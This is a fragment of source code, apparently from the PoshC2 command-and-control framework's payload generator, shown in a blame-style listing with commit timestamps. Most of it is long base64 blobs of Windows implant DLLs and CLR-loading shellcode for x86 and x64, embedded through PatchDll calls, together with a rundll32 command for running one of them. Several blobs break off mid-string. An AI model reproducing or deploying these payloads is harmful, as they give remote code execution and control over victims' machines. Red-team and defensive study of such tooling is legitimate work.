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
2018-07-23 08:55:15 +00:00
self . PatchDll ( " %s Posh_v4_x86.dll " % name , v4_86 , 0x00012F80 , " DLL " )
2018-08-01 08:31:59 +00:00
v4_64 = " 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
self . PatchDll ( " %s Posh_v4_x64.dll " % name , v4_64 , 0x00017500 , " DLL " )
2018-07-23 08:55:15 +00:00
self . QuickstartLog ( " " + Colours . END )
self . QuickstartLog ( " RunDLL Example: " + Colours . GREEN )
self . QuickstartLog ( " rundll32 Posh_x64.dll,VoidFunc " )
def CreateShellcode ( self , name = " " ) :
# Load CLR "v2.0.50727"
self . QuickstartLog ( " " + Colours . END )
self . QuickstartLog ( " Shellcode that loads CLR v2.0.50727 " + Colours . GREEN )
v2_86_offset = 0x000132E0 + 4
2018-08-01 08:31:59 +00:00
v2_86 = " 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
2018-07-23 08:55:15 +00:00
self . PatchDll ( " %s Posh_v2_x86_Shellcode.bin " % name , v2_86 , v2_86_offset , " Shellcode " )
2018-08-01 08:31:59 +00:00
v2_64_offset = 0x00017950 + 8
v2_64 = " 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
2018-07-23 08:55:15 +00:00
